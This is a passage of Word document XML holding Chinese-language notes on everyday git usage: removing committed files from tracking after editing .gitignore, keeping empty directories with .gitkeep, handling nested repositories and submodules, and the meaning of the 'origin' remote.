          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>已经提交过的文件或者文件夹怎么办？此时更改.gitignore文件对已经提交的文件是无效的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C0D2E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B674D8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>单个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以使用如下命令从仓库中删除：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516A9BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git rm --cached logs/xx.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A5BDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>整个目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2289C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git rm --cached -r logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0C20A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果文件很多，那么直接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DC1EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git rm --cached -r .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C153C00" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果提示某个文件无法忽略，可以添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数强制忽略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB877D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git rm -f --cached logs/xx.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079CF27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0CF809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git add .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48946E8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git commit -m "Update .gitignore"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161E5AD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B4D825" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>被忽略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的某个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>强制添加回去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4C30E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git add -f filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4BDD98" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6580E8DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ignore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D721531" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git check-ignore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD9B64" w14:textId="77777777" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896">
      <w:bookmarkStart w:id="51" w:name="_Toc159779512"/>
    </w:p>
    <w:p w14:paraId="42BBBAEF" w14:textId="254675F4" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>.gitkeep:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不追踪空目录但是要保持空目录在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262CE2CC" w14:textId="7D7F922B" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录中新建空文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E62896">
        <w:t>.gitkeep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F32C5" w14:textId="77777777" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896"/>
    <w:p w14:paraId="0CCD983A" w14:textId="77777777" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896"/>
    <w:p w14:paraId="5C07A82E" w14:textId="77777777" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896"/>
    <w:p w14:paraId="2078C1CD" w14:textId="77777777" w:rsidR="00E62896" w:rsidRDefault="00E62896" w:rsidP="00E62896"/>
    <w:p w14:paraId="3CA3C767" w14:textId="1877A97B" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子模块及单拉取子项目</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="722582A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/toopoo/article/details/104225592</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411F80B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60657A76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>拉取某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库，如果该代码中某个目录下存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会认为这是另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库，我们在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git clone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候不会拉取该项目，必须得多一步去单拉此项目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3017F11C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21899CC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374F934C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：鹏哥的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitmisconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目导入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D295C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab-misconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中，由于鹏哥使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件包目录下存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以在进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git add . xxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等一系列操作后，该目录下你就算有改动，也不会上传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C83ACC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，如果你只是要检出其中的某个目录，则使用命令如下，可以单检出某个目录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone --recursive https://github.com/xanzy/go-gitlab </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gitlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13847F9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D1FF91B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EA4698F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74726A3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64629773" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35590932" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C284A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4867CB11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc159779513"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：方便</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户添加多远程链接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="50E62131" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/niexia_/article/details/79422859</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279442B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD07896" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看远程分支，看远程仓库映射关系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>remote -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AF1A56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75923B37" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6B55B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>origin https://github.com/user1/myRepository.git (fetch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649807A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>origin https://github.com/user1/myRepository.git (push)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A4FDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04867BA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>总结来讲，顾名思义，</w:t>
      </w:r>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:t>就是一个名字，它是在你</w:t>
      </w:r>
      <w:r>
        <w:t>clone</w:t>
      </w:r>
      <w:r>
        <w:t>一个托管在</w:t>
      </w:r>
      <w:r>
        <w:t>Github</w:t>
      </w:r>
      <w:r>
        <w:t>上代码库时，</w:t>
      </w:r>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t>为你</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认创建的指向这个远程代码库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> origin</w:t>
      </w:r>
      <w:r>
        <w:t>指向的是</w:t>
      </w:r>
      <w:r>
        <w:t>repository</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:t>只是这个</w:t>
      </w:r>
      <w:r>
        <w:t>repository</w:t>
      </w:r>
      <w:r>
        <w:t>中默认创建的第一个</w:t>
      </w:r>
      <w:r>
        <w:t>branch</w:t>
      </w:r>
      <w:r>
        <w:t>。当你</w:t>
      </w:r>
      <w:r>
        <w:t>git push</w:t>
      </w:r>
      <w:r>
        <w:t>的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>都是默认创建的，所以可以这样省略</w:t>
      </w:r>
      <w:r>
        <w:t>，但是这个是</w:t>
      </w:r>
      <w:r>
        <w:t>bad practice</w:t>
      </w:r>
      <w:r>
        <w:t>，因为当你换一个</w:t>
      </w:r>
      <w:r>
        <w:t>branch</w:t>
      </w:r>
      <w:r>
        <w:t>再</w:t>
      </w:r>
      <w:r>
        <w:t>git push</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，有时候就纠结了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36414E4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02654A53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>假设你在远端开了一个分支叫</w:t>
      </w:r>
      <w:r>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:t>，再将它</w:t>
      </w:r>
      <w:r>
        <w:t>clone</w:t>
      </w:r>
      <w:r>
        <w:t>到本地，本地修改后重新</w:t>
      </w:r>
      <w:r>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:t>，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> git push origin dev</w:t>
      </w:r>
      <w:r>
        <w:t>，就可以</w:t>
      </w:r>
      <w:r>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:t>到对应的远端了。</w:t>
      </w:r>
    </w:p>
